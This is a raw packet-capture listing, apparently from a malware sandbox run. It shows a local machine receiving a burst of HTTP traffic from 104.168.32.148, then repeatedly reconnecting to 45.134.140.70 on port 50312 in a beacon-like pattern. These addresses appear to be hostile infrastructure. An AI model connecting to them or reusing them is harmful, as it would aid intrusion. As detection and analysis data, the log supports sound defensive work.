                                                Sep 25, 2024 18:50:19.663896084 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663907051 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663913012 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663918972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663934946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663953066 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663976908 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.663979053 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.663992882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664031029 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664032936 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664041996 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664055109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664066076 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664068937 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664079905 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664093018 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664096117 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664129019 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664195061 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664205074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664222956 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664235115 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664243937 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664258003 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664263010 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664282084 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664294004 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664294004 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664304972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664316893 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664329052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664340019 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664350986 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664354086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664381981 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664396048 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664402962 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664414883 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664447069 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664448977 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664458990 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664470911 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664508104 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664531946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664545059 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664577007 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664583921 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664589882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664632082 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664654970 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664666891 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664676905 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664688110 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664700031 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664710999 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664721966 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664741039 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664894104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664906025 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664916992 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664927006 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664942980 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664956093 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664956093 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664956093 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.664975882 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664985895 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664998055 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.664998055 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665010929 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665023088 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665024996 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665035963 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665049076 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665069103 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665210962 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665221930 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665236950 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665249109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665260077 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665271044 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665271997 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665286064 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665298939 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665298939 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665312052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665318012 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665335894 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665407896 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665421963 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665445089 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665456057 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665466070 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665478945 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665491104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665493011 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665502071 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665514946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665527105 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665527105 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665555954 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665570021 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665585041 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665791035 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665801048 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665810108 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665833950 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665841103 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665846109 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665857077 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665862083 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665869951 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665879965 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665882111 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665890932 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665901899 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665909052 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665913105 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665925980 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665932894 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665942907 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.665951967 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665963888 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665973902 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665985107 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.665994883 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666006088 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666007042 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666018963 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666019917 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666037083 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666054010 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666107893 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666120052 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666131973 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666141033 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666172028 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666193962 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666205883 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666215897 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666220903 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666230917 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666254044 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666276932 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666285038 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.666290045 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.666327953 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.734375954 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.734395027 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.734409094 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.734467983 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.736987114 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.737004042 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.737015963 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.737030029 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.737046003 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.737060070 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.737098932 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752264977 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752310038 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752329111 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752341986 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752353907 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752372980 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752403975 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752435923 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752448082 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752460003 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752471924 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752482891 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752484083 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752533913 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752548933 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752556086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752568960 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752590895 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752607107 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752607107 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752655029 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752655983 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752669096 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752679110 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752696991 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752707958 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752711058 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752720118 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752736092 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752759933 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752777100 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752897978 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752909899 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752918959 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752931118 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752943993 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752950907 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752963066 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752974987 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752975941 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.752990007 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.752996922 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753000021 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753015041 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753026009 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753030062 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753041983 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753055096 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753056049 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753067017 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753078938 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753110886 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753170013 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753181934 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753190994 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753201008 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753211975 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753216982 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753223896 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753246069 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753258944 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753263950 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753284931 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753297091 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753304005 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753309011 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753329992 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753407001 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753418922 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753429890 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753442049 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753452063 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753453016 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753480911 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753483057 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753495932 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753504992 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753530025 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753590107 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753601074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753611088 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753622055 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753633976 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753637075 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753649950 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.753716946 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.753760099 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:20.003510952 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:20.137453079 CEST4971150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:20.143238068 CEST503124971145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:50:20.143318892 CEST4971150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:20.149177074 CEST4971150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:20.154659986 CEST503124971145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:50:41.546613932 CEST503124971145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:50:41.546803951 CEST4971150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:41.546919107 CEST4971150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:41.551712990 CEST503124971145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:50:42.558100939 CEST4971350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:42.563322067 CEST503124971345.134.140.70192.168.2.5
                                                Sep 25, 2024 18:50:42.563411951 CEST4971350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:42.566917896 CEST4971350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:50:42.572195053 CEST503124971345.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:03.935735941 CEST503124971345.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:03.935894012 CEST4971350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:03.935981989 CEST4971350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:03.940819979 CEST503124971345.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:04.948993921 CEST4971550312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:04.953999043 CEST503124971545.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:04.954138041 CEST4971550312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:04.957710981 CEST4971550312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:04.962625980 CEST503124971545.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:26.326968908 CEST503124971545.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:26.329688072 CEST4971550312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:26.329865932 CEST4971550312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:26.334781885 CEST503124971545.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:27.508852005 CEST4971650312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:27.513698101 CEST503124971645.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:27.516072989 CEST4971650312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:27.519445896 CEST4971650312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:27.524236917 CEST503124971645.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:48.884895086 CEST503124971645.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:48.885817051 CEST4971650312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:48.885817051 CEST4971650312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:48.896327972 CEST503124971645.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:49.902065992 CEST4971750312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:49.908386946 CEST503124971745.134.140.70192.168.2.5
                                                Sep 25, 2024 18:51:49.909658909 CEST4971750312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:49.912940025 CEST4971750312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:51:49.917951107 CEST503124971745.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:11.300097942 CEST503124971745.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:11.300190926 CEST4971750312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:11.300221920 CEST4971750312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:11.305056095 CEST503124971745.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:12.308075905 CEST4971850312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:12.313517094 CEST503124971845.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:12.313596964 CEST4971850312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:12.318135023 CEST4971850312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:12.323858976 CEST503124971845.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:33.738003969 CEST503124971845.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:33.741698027 CEST4971850312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:33.741743088 CEST4971850312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:33.746654034 CEST503124971845.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:34.874615908 CEST4971950312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:34.879648924 CEST503124971945.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:34.879792929 CEST4971950312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:34.883003950 CEST4971950312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:34.888641119 CEST503124971945.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:56.234184027 CEST503124971945.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:56.235749006 CEST4971950312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:56.235749006 CEST4971950312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:56.240698099 CEST503124971945.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:57.245655060 CEST4972050312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:57.250814915 CEST503124972045.134.140.70192.168.2.5
                                                Sep 25, 2024 18:52:57.250900984 CEST4972050312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:57.254540920 CEST4972050312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:52:57.259526014 CEST503124972045.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:18.658833027 CEST503124972045.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:18.658907890 CEST4972050312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:18.659002066 CEST4972050312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:18.664256096 CEST503124972045.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:19.667941093 CEST4972150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:19.672990084 CEST503124972145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:19.673079014 CEST4972150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:19.679529905 CEST4972150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:19.684727907 CEST503124972145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:41.236524105 CEST503124972145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:41.236809015 CEST4972150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:41.237205029 CEST4972150312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:41.242959023 CEST503124972145.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:42.373260021 CEST4972250312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:42.378165960 CEST503124972245.134.140.70192.168.2.5
                                                Sep 25, 2024 18:53:42.378396988 CEST4972250312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:42.383671045 CEST4972250312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:53:42.388619900 CEST503124972245.134.140.70192.168.2.5
                                                Sep 25, 2024 18:54:03.773081064 CEST503124972245.134.140.70192.168.2.5
                                                Sep 25, 2024 18:54:03.773320913 CEST4972250312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:54:03.773320913 CEST4972250312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:54:03.778446913 CEST503124972245.134.140.70192.168.2.5
                                                Sep 25, 2024 18:54:05.027266979 CEST4972350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:54:05.038265944 CEST503124972345.134.140.70192.168.2.5
                                                Sep 25, 2024 18:54:05.039783955 CEST4972350312192.168.2.545.134.140.70
